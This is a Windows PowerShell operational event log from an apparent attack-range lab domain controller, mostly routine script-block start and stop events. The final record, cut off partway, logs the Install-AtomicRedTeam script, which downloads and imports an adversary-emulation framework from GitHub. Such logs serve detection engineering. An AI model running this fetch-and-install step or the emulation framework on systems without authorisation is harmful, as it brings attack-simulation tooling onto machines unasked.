06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466918
Keywords=None
Message=Started invocation of ScriptBlock ID: ac4b6bcc-ad8f-4bb8-ad35-ee671f997bc8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466917
Keywords=None
Message=Completed invocation of ScriptBlock ID: f2a2217f-7628-4710-a651-98322f3c058c
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466916
Keywords=None
Message=Completed invocation of ScriptBlock ID: 52f36eb7-8ed2-40f3-bb40-6dfa489c8208
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466915
Keywords=None
Message=Started invocation of ScriptBlock ID: 52f36eb7-8ed2-40f3-bb40-6dfa489c8208
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466914
Keywords=None
Message=Started invocation of ScriptBlock ID: f2a2217f-7628-4710-a651-98322f3c058c
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466913
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: f2a2217f-7628-4710-a651-98322f3c058c
Path:
06/15/2021 04:59:23 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466912
Keywords=None
Message=Completed invocation of ScriptBlock ID: ac4b6bcc-ad8f-4bb8-ad35-ee671f997bc8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466925
Keywords=None
Message=Started invocation of ScriptBlock ID: ac4b6bcc-ad8f-4bb8-ad35-ee671f997bc8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466924
Keywords=None
Message=Completed invocation of ScriptBlock ID: e9d97339-d9f2-4bb0-98c8-aa60eb0b88e3
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466923
Keywords=None
Message=Completed invocation of ScriptBlock ID: 52f36eb7-8ed2-40f3-bb40-6dfa489c8208
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466922
Keywords=None
Message=Started invocation of ScriptBlock ID: 52f36eb7-8ed2-40f3-bb40-6dfa489c8208
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466921
Keywords=None
Message=Started invocation of ScriptBlock ID: e9d97339-d9f2-4bb0-98c8-aa60eb0b88e3
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466920
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: e9d97339-d9f2-4bb0-98c8-aa60eb0b88e3
Path:
06/15/2021 04:59:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466919
Keywords=None
Message=Completed invocation of ScriptBlock ID: ac4b6bcc-ad8f-4bb8-ad35-ee671f997bc8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466939
Keywords=None
Message=Started invocation of ScriptBlock ID: ac4b6bcc-ad8f-4bb8-ad35-ee671f997bc8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466938
Keywords=None
Message=Completed invocation of ScriptBlock ID: adee5fa3-cfac-4e96-8de0-92ed69ed85a8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 52f36eb7-8ed2-40f3-bb40-6dfa489c8208
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466936
Keywords=None
Message=Started invocation of ScriptBlock ID: 52f36eb7-8ed2-40f3-bb40-6dfa489c8208
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466935
Keywords=None
Message=Started invocation of ScriptBlock ID: adee5fa3-cfac-4e96-8de0-92ed69ed85a8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466934
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: adee5fa3-cfac-4e96-8de0-92ed69ed85a8
Path:
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466933
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8112a2c-383d-4238-a74f-011706a2cc32
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466932
Keywords=None
Message=Started invocation of ScriptBlock ID: a8112a2c-383d-4238-a74f-011706a2cc32
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466931
Keywords=None
Message=Completed invocation of ScriptBlock ID: 07107ac9-595a-47b4-984a-26f3bff2b2f3
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466930
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6c9d7205-a316-46e8-b211-b78db3ed7784
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466929
Keywords=None
Message=Started invocation of ScriptBlock ID: 6c9d7205-a316-46e8-b211-b78db3ed7784
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466928
Keywords=None
Message=Started invocation of ScriptBlock ID: 07107ac9-595a-47b4-984a-26f3bff2b2f3
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466927
Keywords=None
Message=Creating Scriptblock text (1 of 1):
clear

ScriptBlock ID: 07107ac9-595a-47b4-984a-26f3bff2b2f3
Path:
06/15/2021 04:59:25 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466926
Keywords=None
Message=Completed invocation of ScriptBlock ID: ac4b6bcc-ad8f-4bb8-ad35-ee671f997bc8
Runspace ID: c48e1d16-7a1d-4f4f-aebf-2c2c52136eb0
06/15/2021 04:59:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1466941
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5204 in AppDomain: DefaultAppDomain.
06/15/2021 04:59:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1466940
Keywords=None
Message=PowerShell console is starting up
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466956
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9170f589-62fc-4458-8119-9a563c2962dc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466955
Keywords=None
Message=Started invocation of ScriptBlock ID: 9170f589-62fc-4458-8119-9a563c2962dc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466954
Keywords=None
Message=Completed invocation of ScriptBlock ID: c4db51a6-743c-4150-b467-5492f8eeeb60
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466953
Keywords=None
Message=Started invocation of ScriptBlock ID: c4db51a6-743c-4150-b467-5492f8eeeb60
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466952
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466951
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8f35e418-fd5d-460e-8b7d-946cd8e071ff
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466950
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466949
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466948
Keywords=None
Message=Started invocation of ScriptBlock ID: 8f35e418-fd5d-460e-8b7d-946cd8e071ff
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466947
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 8f35e418-fd5d-460e-8b7d-946cd8e071ff
Path:
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1466946
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466945
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4a8647c8-e083-48e6-bb19-c8f0641e3ccd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466944
Keywords=None
Message=Started invocation of ScriptBlock ID: 4a8647c8-e083-48e6-bb19-c8f0641e3ccd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466943
Keywords=None
Message=Completed invocation of ScriptBlock ID: a559300a-9b60-46ad-870d-17c3b3626d78
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466942
Keywords=None
Message=Started invocation of ScriptBlock ID: a559300a-9b60-46ad-870d-17c3b3626d78
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466964
Keywords=None
Message=Completed invocation of ScriptBlock ID: 13943163-bbec-4de4-bbfc-a59d80c8efb0
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466963
Keywords=None
Message=Started invocation of ScriptBlock ID: 13943163-bbec-4de4-bbfc-a59d80c8efb0
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1466962
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1bb48c88-d884-4e7f-a01a-cbb7d8f59d3b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1466961
Keywords=None
Message=Started invocation of ScriptBlock ID: 1bb48c88-d884-4e7f-a01a-cbb7d8f59d3b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:32 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1466960
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Install-AtomicRedTeam {
  
    <#
    .SYNOPSIS

        This is a simple script to download and install the Atomic Red Team Invoke-AtomicRedTeam Powershell Framework.

        Atomic Function: Install-AtomicRedTeam
        Author: Red Canary Research
        License: MIT License
        Required Dependencies: powershell-yaml
        Optional Dependencies: None

    .PARAMETER DownloadPath

        Specifies the desired path to download Atomic Red Team.

    .PARAMETER InstallPath

        Specifies the desired path for where to install Atomic Red Team.

    .PARAMETER Force

        Delete the existing InstallPath before installation if it exists.

    .EXAMPLE

        Install Atomic Red Team
        PS> Install-AtomicRedTeam.ps1

    .NOTES

        Use the '-Verbose' option to print detailed information.

#>
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory = $False, Position = 0)]
        [string]$InstallPath = $( if ($IsLinux -or $IsMacOS) { $Env:HOME + "/AtomicRedTeam" } else { $env:HOMEDRIVE + "\AtomicRedTeam" }),

        [Parameter(Mandatory = $False, Position = 1)]
        [string]$DownloadPath = $InstallPath,

        [Parameter(Mandatory = $False, Position = 2)]
        [string]$RepoOwner = "redcanaryco",

        [Parameter(Mandatory = $False, Position = 3)]
        [string]$Branch = "master",

        [Parameter(Mandatory = $False, Position = 4)]
        [switch]$getAtomics = $False,

        [Parameter(Mandatory = $False)]
        [switch]$Force = $False # delete the existing install directory and reinstall
    )
    Try {
        $InstallPathwIart = Join-Path $InstallPath "invoke-atomicredteam"
        $modulePath = Join-Path "$InstallPath" "invoke-atomicredteam\Invoke-AtomicRedTeam.psd1"
        if ($Force -or -Not (Test-Path -Path $InstallPathwIart )) {
            write-verbose "Directory Creation"
            if ($Force) {
                Try { 
                    if (Test-Path $InstallPathwIart) { Remove-Item -Path $InstallPathwIart -Recurse -Force -ErrorAction Stop | Out-Null }
                }
                Catch {
                    Write-Host -ForegroundColor Red $_.Exception.Message
                    return
                }
            }
            if (-not (Test-Path $InstallPath)) { New-Item -ItemType directory -Path $InstallPath | Out-Null }

            $url = "https://github.com/$RepoOwner/invoke-atomicredteam/archive/$Branch.zip"
            $path = Join-Path $DownloadPath "$Branch.zip"
            [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
            write-verbose "Beginning download from Github"
            Invoke-WebRequest $url -OutFile $path

            write-verbose "Extracting ART to $InstallPath"
            $zipDest = Join-Path "$DownloadPath" "tmp"
            expand-archive -LiteralPath $path -DestinationPath "$zipDest" -Force:$Force
            $iartFolderUnzipped = Join-Path $zipDest "invoke-atomicredteam-$Branch"
            Move-Item $iartFolderUnzipped $InstallPathwIart
            Remove-Item $zipDest -Recurse -Force
            Remove-Item $path

            if (-not (Get-InstalledModule -Name "powershell-yaml" -ErrorAction:SilentlyContinue)) { 
                write-verbose "Installing powershell-yaml"
                Install-Module -Name powershell-yaml -Scope CurrentUser -Force
            }

            write-verbose "Importing invoke-atomicRedTeam module"
            Import-Module $modulePath -Force

            if ($getAtomics) {
                Write-Verbose "Installing Atomics Folder"
